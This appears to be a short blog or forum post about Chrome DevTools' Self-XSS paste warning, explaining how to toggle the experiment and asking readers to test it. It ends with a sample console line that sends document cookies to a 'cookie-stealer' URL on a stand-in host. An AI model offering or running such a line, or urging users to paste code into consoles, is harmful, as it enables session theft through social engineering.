Disable paste protection in Chrome DevTools?

What is it?

Ostensibly, it’s this experimental feature in DevTools:

If you are a new DevTools user and you attempt to paste code, the Sources panel now shows you the Do you trust this code? dialog and the Console now displays a similar warning. Paste only the code that you understand and have reviewed yourself. To paste, type “allow pasting” when prompted. Once pasting has been allowed once, the warning will never be shown again.

Apparently this was proposed back in 2014.

How do I turn it on/off?

Open DevTools > Settings (top-right corner) > Experiments > Toggle Show warning about Self-XSS when pasting code

enter image description here

….however in Chrome 120 (December 2023) I’m able to paste self-0wning code into the console with no warnings or messages, curious.

enter image description here

I’m curious if anyone else gets a message – try copying+pasting the below script.

fetch( 'https://example.com/cookie-stealer?' + document.cookies )

Leave a Comment